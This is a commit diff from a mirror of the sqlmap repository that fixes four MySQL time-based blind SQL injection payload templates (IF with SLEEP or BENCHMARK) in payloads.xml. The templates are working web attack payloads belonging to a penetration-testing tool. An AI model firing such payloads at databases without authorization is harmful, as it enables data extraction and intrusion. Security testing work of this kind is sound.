sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-03 05:04:11 +03:00
Code Issues Packages Projects Releases Wiki Activity

another fix for MySQL time based payloads

Browse Source
This commit is contained in:
Miroslav Stampar 2010-12-08 12:00:27 +00:00
parent 8227e6d3cf
commit ad00fe13c1
1 changed files with 5 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
xml/payloads.xml
View File

@ -1426,7 +1426,7 @@ Formats:
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
<vector>AND [RANDNUM]=IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM])</vector>
<request>
<payload>AND SLEEP([SLEEPTIME])</payload>
</request>
@ -1446,7 +1446,7 @@ Formats:
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND IF(([INFERENCE]), [RANDNUM], BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')))</vector>
<vector>AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM])</vector>
<request>
<payload>AND BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
</request>
@ -1585,7 +1585,8 @@ Formats:
<risk>3</risk>
<clause>1,2,3</clause>
<where>2</where>
<vector>OR IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
<!-- NOTE: =0 needs to stay or else MySQL goes nunners -->
<vector>OR IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM])=0</vector>
<request>
<payload>OR SLEEP([SLEEPTIME])=0</payload>
</request>
@ -1605,7 +1606,7 @@ Formats:
<risk>3</risk>
<clause>1,2,3</clause>
<where>2</where>
<vector>OR IF(([INFERENCE]), [RANDNUM], BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')))</vector>
<vector>OR [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM])</vector>
<request>
<payload>OR BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
</request>